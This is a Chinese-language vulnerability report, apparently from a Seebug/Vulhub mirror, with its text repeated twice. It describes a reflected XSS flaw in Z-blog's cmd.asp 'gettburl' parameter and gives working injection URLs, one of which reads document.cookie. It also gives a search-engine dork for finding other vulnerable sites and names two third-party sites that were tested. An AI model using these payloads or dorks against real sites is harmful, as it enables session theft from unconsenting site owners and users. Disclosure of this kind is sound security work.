VULHUB ™

### 简要描述： 貌似听朋友说,剑心蝈蝈看到小厂商的XSS是审核不过的,所以我尴尬了,今天研究博客的时候无意发现了Z-blog博客存在的一个小XSS,在引用地址这里,试了试可以! ### 详细说明： 官方试了一下,可以弹, ``` http://download.rainbowsoft.org/cmd.asp?act=gettburl&id=104%22%3E%3Cimg%20src=1%20onerror=alert(1);%3E ``` [<img src="https://images.seebug.org/upload/201302/16111417fa2b0f7ae3e10c09c3363309722dfa59.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111417fa2b0f7ae3e10c09c3363309722dfa59.jpg) 然后GG一下 inurl:cmd.asp?act=gettburl&id= [<img src="https://images.seebug.org/upload/201302/16111848a1b72ca61d24a68c116b1cc9516eb873.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111848a1b72ca61d24a68c116b1cc9516eb873.jpg) 先拿俩试试吧~ http://www.moguozhong.com/cmd.asp?act=gettburl&id=39 http://www.yeslin.com/cmd.asp?act=gettburl&id=15 [<img src="https://images.seebug.org/upload/201302/16111732ccbe5fee4dc6abe6c3ef7b5a52fa0c61.jpg" alt="3.jpg" width="600"...

### 简要描述： 貌似听朋友说,剑心蝈蝈看到小厂商的XSS是审核不过的,所以我尴尬了,今天研究博客的时候无意发现了Z-blog博客存在的一个小XSS,在引用地址这里,试了试可以! ### 详细说明： 官方试了一下,可以弹, ``` http://download.rainbowsoft.org/cmd.asp?act=gettburl&id=104%22%3E%3Cimg%20src=1%20onerror=alert(1);%3E ``` [<img src="https://images.seebug.org/upload/201302/16111417fa2b0f7ae3e10c09c3363309722dfa59.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111417fa2b0f7ae3e10c09c3363309722dfa59.jpg) 然后GG一下 inurl:cmd.asp?act=gettburl&id= [<img src="https://images.seebug.org/upload/201302/16111848a1b72ca61d24a68c116b1cc9516eb873.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111848a1b72ca61d24a68c116b1cc9516eb873.jpg) 先拿俩试试吧~ http://www.moguozhong.com/cmd.asp?act=gettburl&id=39 http://www.yeslin.com/cmd.asp?act=gettburl&id=15 [<img src="https://images.seebug.org/upload/201302/16111732ccbe5fee4dc6abe6c3ef7b5a52fa0c61.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111732ccbe5fee4dc6abe6c3ef7b5a52fa0c61.jpg) [<img src="https://images.seebug.org/upload/201302/16111830e51b0e0e10d1b0b602764bc3edbbc171.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111830e51b0e0e10d1b0b602764bc3edbbc171.jpg) ### 漏洞证明： ``` http://download.rainbowsoft.org/cmd.asp?act=gettburl&id=22"><script>alert(document.cookie)</script> ``` [<img src="https://images.seebug.org/upload/201302/16111453cd7c7dbd5b1871b1f4f759cf0c62ef75.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201302/16111453cd7c7dbd5b1871b1f4f759cf0c62ef75.jpg)